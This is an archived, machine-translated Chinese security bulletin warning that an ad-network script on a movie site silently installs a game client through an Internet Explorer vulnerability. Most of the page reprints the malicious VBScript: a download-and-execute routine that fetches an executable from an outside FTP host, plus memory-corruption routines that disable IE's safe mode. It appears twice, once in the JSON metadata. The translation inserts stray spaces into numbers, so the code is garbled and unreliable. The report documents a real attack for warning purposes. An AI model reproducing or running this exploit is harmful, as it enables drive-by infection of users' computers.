Search...

2 5 2 9 net Union the use of the latest ie vulnerability mandatory installation of light micro-end-bug warning-the black bar safety net

2015-01-02T00:00:00

ID MYHACK58:62201557629
Type myhack58
Reporter 佚名
Modified 2015-01-02T00:00:00

Description

I'm using Baidu browser ie compatible mode to browse http://www.dy2018.com this movie site, and found that somehow run the one called“Shine micro-end”of the game client, then I used smartsniff packet capture analysis, in the view source when the found a 2 5 2 9 net Union js advertising code, which is the latest published 1 8 years of aging of the ie vulnerability that! Reference to this js from the IT ftp download kuaidu_2_23_01. exe and run!

Visit http://www. 2 5 2 9. com/page/ms. js you can see this js code, use ie access to the www. dy2018. com or direct reference to this js will be automatically installed on the computer light micro end

function runmumaa() On Error Resume Next Set objWsh = CreateObject("Wscript. Shell")

objWsh. run "cmd.exe /c del /F %temp%\ftp.txt & echo open 218.2.22.173>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo bin>>%temp%\ftp.txt & echo user>>%temp%\ftp. txt&echo anonymous>>%temp%\ftp. txt&echo testpass>>%temp%\ftp. txt&echo get kuaidu_2_23_01.exe>>%temp%\ftp.txt & echo bye>>%temp%\ftp.txt ",0,true

objWsh. run "cmd.exe /c cd %temp% & ftp-s:""%temp%\ftp.txt""",0,true

wscript. sleep 1 0 0 0

objWsh. run """%temp%\kuaidu_2_23_01.exe""",0,true

document. write(Err. Description) end function

dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray

Begin()

function Begin() On Error Resume Next info=Navigator. UserAgent

if(instr(info,"Win64")>0) then exit function end if

if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function

end if

win9x=0

BeginInit() If Create()=True Then myarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0) myarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)

if(intVersion<4) then document. write("<br> IE") document. write(intVersion) runshellcode() else setnotsafemode() end if end if end function

function BeginInit() Randomize() redim aa(5) redim ab(5) a0=1 3+1 7rnd(6) a3=7+3rnd(5) end function

function Create() On Error Resume Next dim i Create=False For i = 0 To 4 0 0 If Over()=True Then 'document. write(i) Create=True Exit For End If Next end function

sub testaa() end sub

function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2)

ab(0)=0 aa(a1)=i ab(0)=6.36598737437801 E-3 1 4

aa(a1+2)=myarray ab(2)=1.74088534731324 E-3 1 0 mydata=aa(a1) redim Preserve aa(a0) end function

function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+1, 6) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=1 4) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0)

j=0 j=readmemo(i+&h120+k)

Exit for end if

next ab(2)=1.69759663316747 E-3 1 3 runmumaa() end function

function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000

redim Preserve aa(a0) redim ab(a0)

redim Preserve aa(a2)

type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=1 0

If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)1 6 j=vartype(aa(a1-1)) if((j=mem+4) or (j8=mem+8)) thenif(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function

end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if

If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If

redim Preserve aa(a0)

end function

function ReadMemo(add) On Error Resume Next redim Preserve aa(a2)

ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747 E-3 1 3 ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0) end function

[1] [2] next

JSON Vulners Source

Initial Source

{"hash": "476028853a5979a69b9b2652351086bf576bcc95c07d8d0e0a65e55136aab1d4", "id": "MYHACK58:62201557629", "modified": "2015-01-02T00:00:00", "history": [], "published": "2015-01-02T00:00:00", "type": "myhack58", "edition": 1, "references": [], "objectVersion": "1.2", "href": "http://www.myhack58.com/Article/html/3/62/2015/57629.htm", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-15T18:11:31"}, "dependencies": {"references": [], "modified": "2016-11-15T18:11:31"}, "vulnersScore": -0.0}, "cvelist": [], "title": "2 5 2 9 net Union the use of the latest ie vulnerability mandatory installation of light micro-end-bug warning-the black bar safety net", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "615dcd5d88f723654b6ee6b92330be3b", "key": "description"}, {"hash": "90f46c52b8a24c70f36fa571aa458e6e", "key": "href"}, {"hash": "8fcc08781c4f010982b28a3dd67bd59c", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "8fcc08781c4f010982b28a3dd67bd59c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "ffb00412e43fc5ac3cf123b371a5bc54", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "viewCount": 0, "description": "I'm using Baidu browser ie compatible mode to browse http://www.dy2018.com this movie site, and found that somehow run the one called\u201cShine micro-end\u201dof the game client, then I used smartsniff packet capture analysis, in the view source when the found a 2 5 2 9 net Union js advertising code, which is the latest published 1 8 years of aging of the ie vulnerability that! Reference to this js from the IT ftp download kuaidu_2_23_01. exe and run!\n\nVisit http://www. 2 5 2 9. com/page/ms. js you can see this js code, use ie access to the www. dy2018. com or direct reference to this js will be automatically installed on the computer light micro end \n\n\n\nfunction runmumaa() \nOn Error Resume Next\nSet objWsh = CreateObject(\"Wscript. Shell\") \n\nobjWsh. run \"cmd.exe /c del /F %temp%\\ftp.txt & echo open 218.2.22.173>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo bin>>%temp%\\ftp.txt & echo user>>%temp%\\ftp. txt&echo anonymous>>%temp%\\ftp. txt&echo testpass>>%temp%\\ftp. txt&echo get kuaidu_2_23_01.exe>>%temp%\\ftp.txt & echo bye>>%temp%\\ftp.txt \",0,true\n\nobjWsh. run \"cmd.exe /c cd %temp% & ftp-s:\"\"%temp%\\ftp.txt\"\"\",0,true\n\nwscript. sleep 1 0 0 0\n\nobjWsh. run \"\"\"%temp%\\kuaidu_2_23_01.exe\"\"\",0,true\n\ndocument. write(Err. Description)\nend function\n\ndim aa()\ndim ab()\ndim a0\ndim a1\ndim a2\ndim a3\ndim win9x\ndim intVersion\ndim rnda\ndim funclass\ndim myarray\n\nBegin()\n\nfunction Begin()\nOn Error Resume Next\ninfo=Navigator. UserAgent\n\nif(instr(info,\"Win64\")>0) then\nexit function\nend if\n\nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse\nexit function \n\nend if\n\nwin9x=0\n\nBeginInit()\nIf Create()=True Then\nmyarray= chrw(0 1)&chrw(2 1 7 6)&chrw(0 1)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)&chrw(0 0)\nmyarray=myarray&chrw(0 0)&chrw(3 2 7 6 7)&chrw(0 0)&chrw(0)\n\nif(intVersion<4) then\ndocument. write(\"<br> IE\")\ndocument. write(intVersion)\nrunshellcode() \nelse \nsetnotsafemode()\nend if\nend if\nend function\n\nfunction BeginInit()\nRandomize()\nredim aa(5)\nredim ab(5)\na0=1 3+1 7*rnd(6)\na3=7+3*rnd(5)\nend function\n\nfunction Create()\nOn Error Resume Next\ndim i\nCreate=False\nFor i = 0 To 4 0 0\nIf Over()=True Then\n'document. write(i) \nCreate=True\nExit For\nEnd If \nNext\nend function\n\nsub testaa()\nend sub\n\nfunction mydata()\nOn Error Resume Next\ni=testaa\ni=null\nredim Preserve aa(a2) \n\nab(0)=0\naa(a1)=i\nab(0)=6.36598737437801 E-3 1 4\n\naa(a1+2)=myarray\nab(2)=1.74088534731324 E-3 1 0 \nmydata=aa(a1)\nredim Preserve aa(a0) \nend function \n\n\nfunction setnotsafemode()\nOn Error Resume Next\ni=mydata() \ni=readmemo(i+8)\ni=readmemo(i+1, 6)\nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4\nj=readmemo(i+&h120+k)\nif(j=1 4) then\nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4)\nredim Preserve aa(a0) \n\nj=0 \nj=readmemo(i+&h120+k) \n\nExit for\nend if\n\nnext \nab(2)=1.69759663316747 E-3 1 3\nrunmumaa() \nend function\n\nfunction Over()\nOn Error Resume Next\ndim type1,type2,type3\nOver=False\na0=a0+a3\na1=a0+2\na2=a0+&h8000000\n\nredim Preserve aa(a0) \nredim ab(a0) \n\nredim Preserve aa(a2)\n\ntype1=1\nab(0)=1.123456789012345678901234567890\naa(a0)=1 0\n\nIf(IsObject(aa(a1-1)) = False) Then\nif(intVersion<4) then\nmem=cint(a0+1)*1 6 \nj=vartype(aa(a1-1))\nif((j=mem+4) or (j*8=mem+8)) thenif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1))\nend if \nend if\nelse\nredim Preserve aa(a0)\nexit function\n\nend if \nelse\nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then\ntype1=VarType(aa(a1))\nend if \nend if\nend if\nend if\n\n\nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then\nOver=True\nwin9x=1\nEnd If \n\nredim Preserve aa(a0) \n\nend function\n\nfunction ReadMemo(add) \nOn Error Resume Next\nredim Preserve aa(a2) \n\nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747 E-3 1 3 \nReadMemo=lenb(aa(a1)) \n\nab(0)=0 \n\nredim Preserve aa(a0)\nend function\n\n**[1] [[2]](<57629_2.htm>) [next](<57629_2.htm>)**", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-11-15T18:11:31"}